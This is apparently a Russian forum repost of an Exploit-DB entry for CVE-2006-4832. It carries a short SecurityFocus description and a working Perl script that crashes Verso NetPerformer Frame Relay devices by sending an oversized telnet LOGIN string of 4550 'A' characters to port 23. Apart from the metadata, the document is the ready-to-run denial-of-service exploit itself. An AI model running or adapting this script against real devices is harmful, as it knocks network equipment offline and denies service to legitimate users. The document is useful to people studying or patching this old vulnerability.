- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 28542
- Проверка EDB
-
- Пройдено
- Автор
- ARIF JATMOKO
- Тип уязвимости
- DOS
- Платформа
- MULTIPLE
- CVE
- cve-2006-4832
- Дата публикации
- 2006-09-13
Код:
source: https://www.securityfocus.com/bid/19989/info
Verso NetPerformer Frame Relay Access Device (FRAD) is prone to a remotely exploitable buffer overflow in the telnet service.
A remote attacker can exploit this issue to execute arbitrary code on the affected device. Failed exploit attempts will likely crash the device, denying service to legitimate users.
# __START_CODE
#
#!/usr/bin/perl
use IO::Socket;
use strict;
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "23",
Proto => "TCP"))
{
print "Modhiar'000 ..... killing netperformer ... $ARGV[0]
port 23...";
sleep(1);
print $socket "LOGIN " . "A" x 4550 . "BCDE\r\n";
sleep(1);
print $socket "PASS " . "\r\n";
close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:23\n";
}
# __END_CODE
- Источник
- www.exploit-db.com